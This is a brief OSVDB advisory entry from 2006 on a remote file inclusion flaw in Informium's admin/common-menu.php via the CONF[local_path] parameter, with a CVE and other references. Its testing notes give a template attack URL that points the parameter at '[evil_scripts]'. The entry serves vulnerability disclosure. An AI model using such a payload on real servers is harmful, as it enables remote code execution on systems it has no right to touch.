Informium common-menu.php CONF[local_path] Variable Remote File Inclusion

2006-06-02T09:35:15
ID OSVDB:25988
Type osvdb
Reporter OSVDB
Modified 2006-06-02T09:35:15

Description

Manual Testing Notes

http://[target]/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]

References:

Vendor URL: http://sourceforge.net/project/showfiles.php?group_id=51190&release_id=100921 Secunia Advisory ID:20448 Generic Exploit URL: http://milw0rm.com/exploits/1865 FrSIRT Advisory: ADV-2006-2131 CVE-2006-2818 Bugtraq ID: 18249